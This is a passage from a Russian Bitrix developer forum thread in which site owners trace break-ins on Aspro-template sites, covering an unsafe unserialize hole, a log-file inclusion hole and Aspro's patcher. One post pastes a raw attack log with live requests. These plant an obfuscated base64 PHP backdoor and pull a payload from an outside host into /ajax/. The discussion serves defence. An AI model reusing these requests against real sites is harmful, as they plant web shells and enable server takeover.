Разработчикам

Форум

Заражение сайтов

Постоянный посетитель

Сообщений: 51 Баллов: 10 Регистрация: 23.11.2011

#141

26.02.2025 16:21:01

Цитата
написал: Итого через пару дней пошло заражение. - файлы типа *7ea*6eb.php в аджакс папке.Т.е. дырища где-то в другом месте. И почему эта дырища в свежекупленном в 2024-2025г шаблоне от аСПРО, поражает но не удивляет.

Через какой файл взломали вас, выяснили?

Пользователь 560275

Заглянувший

Сообщений: 3 Регистрация: 04.08.2016

#142

27.02.2025 11:45:34

Цитата

написал:

Цитата

написал:

Цитата

написал:
овость от 06.02.2025 по теме для решений от Аспро: Взломы сайтов на решениях Аспро: как обезопасить проект Проблема актуальна для решений Аспро, не обновлявшихся с лета 2023 года.Для проектов Аспро, снятых с поддержки, есть Патчер безопасности . Прямая ссылка на патчер: https://aspro.ru/upload/fixit.zip (распаковать в корень сайта, перейти по ссылке https://mydomain.com /fixit.php)Информация для исправления вручную: Общая информация по исправлению уязвимости unserialize ЦитатаРешениеДля исправления уязвимости нужно в местах, где используется функция unserialize, указать в качестве второго аргумента ['allowed_classes' => false].Пример:было: unserialize($_REQUEST["PARAMS"])стало: unserialize($_REQUEST["PARAMS"], ['allowed_classes' => false])Обязательно проверить директории:/ajax//include//form//bitrix/components/aspro/Запустить поиск по этим папкам слова unserialize и внести правки во всех местах где требуется.Если у вас вместо unserialize используется Solution::unserialize() или CMax::unserialize, то ничего добавлять не нужно. Эти методы уже содержат правку. То есть у вас установлено обновление, устраняющее эту уязвимость.

!!!!!!!!!!!!! Ни в коем случае не запускайте данный патч в режиме исправления, если не хотите положить сайт !!!!!!!!!!
Только в режиме просмотра.
При исправлении там сплошные синтаксические ошибки, задвоения аргументов и т.п.

Я использовал этот патч, предварительно локально проверив его работу. У меня он ничего не поломал, применил на 3х сайтах, все ок.

Кто-то еще применял патч? После него были заражения?
Этот патч находит все файлы с уязвимым кодом и меняет его на

$arParams = unserialize(urldecode($_REQUEST["PARAMS"]), ['allowed_classes' => false]);

Может еще что-то добавляет в аспрошных классах, там не смотрел.

Добрый день! А что значит запускать в режиме просмотра?

Пользователь 407969

Посетитель

Сообщений: 32 Баллов: 6 Регистрация: 12.01.2017

#143

27.02.2025 12:03:08

Цитата
Олег Пиманов написал: Добрый день! А что значит запускать в режиме просмотра?

Добрый день. Получить список файлов где может быть уязвимость. (все файлы с unserialize без 'allowed_classes)

Пользователь 560275

Заглянувший

Сообщений: 3 Регистрация: 04.08.2016

#144

27.02.2025 14:56:47

Цитата
написал: https://mydomain.com /fixit.php

https://mydomain.com/fixit.php Т.е. просто открываем и там уже выбираем режим. Я просто не запускал его еще, нет тестового сайт на битрикс

Пользователь 4345922

Заглянувший

Сообщений: 23 Баллов: 2 Регистрация: 15.06.2020

#145

28.02.2025 08:08:29

Подверждаю, все файлы от Аспро пропатчены, хвосты везде где можно вычищены, сегодня снова обнаружил вредоносные скрипты в корне и в assets. По логам зашли через скрипты /ajax (логи забрал для детального изучения).

Пользователь 4944368 Заглянувший Сообщений: 1 Регистрация: 28.02.2025	#146 0 28.02.2025 10:24:41 Напишите пожалуйста если будет какая то полезная информация из логов

Пользователь 4345922

Заглянувший

Сообщений: 23 Баллов: 2 Регистрация: 15.06.2020

#147

28.02.2025 12:44:26

Судя по всему это дерьмо действует через REFERER (бегло глянул - действительно в запрашиваемых скриптах имеется некая обработка Referer).
Вот вся цепочка атаки (время - запрос - referer):

Код

QUERIES:
04:06:59 GET /ajax/form.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt         https://victim.ru:443/ajax/js_error.php?data=%3C?php%20FilE_pUt_contenTS($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/79bb1c7d7b7d.php%22,BaSE64_DecODE(%22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K%22));unlink($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/js_error.txt%22);?%3E
04:07:00 GET /form/index.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt         https://victim.ru:443/ajax/form.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt
04:07:00 GET /ajax/form.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt         https://victim.ru:443/ajax/js_error.php?data=%3C?php%20fiLE_pUt_contenTS($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/79bb1c7d7b7d.php%22,File_GEt_coNTeNTs(%22http://looklong.com/accesson20.html%22));unlink($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/js_error.txt%22);?%3E
04:07:01 GET /form/index.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt       https://victim.ru:443/ajax/form.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt
04:07:01 GET /form/index.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt       https://victim.ru:443/ajax/form.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt

Первая попытка закинуть через base64 вероятно оказалась неуспешной, далее видим, что отсюда качается payload - http://looklong.com/accesson20.html (не знаю, можно ли такие ссылки оставлять???)
После этого следующий запрос уже к accesson.php, первый раз со статусом 301 (там при вызове определенные условия должны соблюдаться злоумышленником, чтобы не получить Forbidden), второй раз уже 200 и пошло-поехало, POST запросы к нему и создание всякого на сервере в папке /ajax.
Планирую сейчас повторить действия ну и дальше уже видимо допиливать безопасность скриптов /ajax/form.php и /form/index.php (безопасная десериализация присутствует - патч от аспро установлен).

Пользователь 407969 Посетитель Сообщений: 32 Баллов: 6 Регистрация: 12.01.2017	#148 0 28.02.2025 12:48:38 Александр, /ajax/js_error.txt удалён?

Пользователь 4345922 Заглянувший Сообщений: 23 Баллов: 2 Регистрация: 15.06.2020	#149 0 28.02.2025 12:57:58 Да, js_error.txt отсутствовал.

Пользователь 1242163

Посетитель

Сообщений: 23 Баллов: 3 Регистрация: 30.06.2017

#150

28.02.2025 13:04:50

Цитата
написал: Судя по всему это дерьмо действует через REFERER (бегло глянул - действительно в запрашиваемых скриптах имеется некая обработка Referer).Вот вся цепочка атаки (время - запрос - referer):

проверьте у себя наличие файлов:
/ajax/error_log_logic.php
/ajax/js_error.php

если они есть, то 99% взломали с использованием этих файлов.

по факту у Аспро были дыры минимум двух типов:
1) опасный unserialize — лечится, через добавление allowed_classes
2) запись вредоносного кода в лог-файл js_error.txt через дыру в /ajax/error_log_logic.php, а далее запуск этого кода как инклюда при вызове "дырявых" /ajax/form.php или /form/index.php

и Аспро было уже как минимум две версии патчера:
1) лечил только unserialize
2) во втором также закрывалась вторая дыра путем удаления дырявых файлов /ajax/error_log_logic.php и /ajax/js_error.php и закомментирования небезопасного когда в /ajax/form.php и /form/index.php.

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером